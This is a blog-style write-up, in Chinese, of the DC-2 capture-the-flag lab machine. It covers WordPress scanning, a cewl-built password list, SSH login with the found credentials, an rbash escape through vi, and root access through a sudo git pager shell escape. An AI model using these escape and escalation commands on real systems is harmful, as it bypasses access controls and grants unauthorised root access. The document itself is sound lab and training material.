DC-2

1 信息收集

开放了80(web-wordpress)和7744(ssh),系统为linux

{"ip":"192.168.1.109","port":7744,"service":"ssh","Banner":"SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7\\x0d\\x0a","url":""}
{"ip":"192.168.1.109","port":80,"service":"http","Banner":"","url":"http://192.168.1.109:80"}
{"url":"http://192.168.1.109:80","StatusCode":200,"Title":"DC-2–JustanotherWordPresssite","HeaderDigest":"server:Apache/2.4.10 (Debian)","Length":53562,"KeywordFinger":"WordPress","HashFinger":""}

拿nuclei扫了下wordpress,存在xss(没啥用),ssrf(可能有用),

信息泄露,存在两个用户adminjerry/ Jerry Mouse

2 从web进行尝试

进wordpress看了下,里面flag1直接给了,说下一个flag需要登录,而且自己的字典可能不够用,需要用到cewl

看了下这个ssrf,是利用rpc的方法来发出请求,但没法利用,找到了wp的版本是4.7.10,貌似已经修复了?

wpscan扫了一下

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |
 | [!] 40 vulnerabilities identified:
 |
......

扫出来挺多漏洞,因为版本比较老了(4年前的老版本,算是降维打击了),看见一个未授权查看私有博文的漏洞,找了几篇文章看了下,拿到了flag2http://dc-2/?static=1

flag2说wp打不进去就去找另一个入口,指的ssh

前面说了要用cewl生成字典,看了下原理,是把网页中的词扒下来再处理一下

拿一个账号试试看jerry: adipiscing,发现这个上不了ssh,可能密码不对?

换一个账号试试tom: parturient,可以了

3 绕过rbash

rbash,也是restricted shell(受限的shell),属于安全功能,维基百科里竟然还有绕过方法(启动一个有shell特性函数的程序):使用vi,使用bash

可以使用的命令有这几个,那就只能使用vi

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi

tom@DC-2:~$ vi
:set shell=/bin/sh
:shell

# 虽然不受限了,但PATH仍然没有变
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin

# 拿到 flag3
tom@DC-2:~$ /bin/cat flag*
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
# 这句话大致是想说,可以看看jerry?

4 提权

这样操作很麻烦,试了下有权限修改环境变量

tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH  # 添加bin的路径
tom@DC-2:~$ export SHELL=/bin/bash:$SHELL  # 添加bash的路径

LinEnum扫了下,没可利用的漏洞,想起来前面那个flag3,之前ssh是没有登录上jerry的账号的,切换一下试试(这一步有点奇怪)

tom@DC-2:~$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!! # 这里提到了git,但摸不着头,看了下wp

看一下当前用户在sudo下有无可用命令,git在内

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

这有一篇sudo提权的文章,用里面的方法提权

sudo git help config
##输入!/bin/sh  并回车执行shell

拿到最后一个flag

root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
posted @ 2022-04-04 20:34  R3col  阅读(60)  评论(0编辑  收藏  举报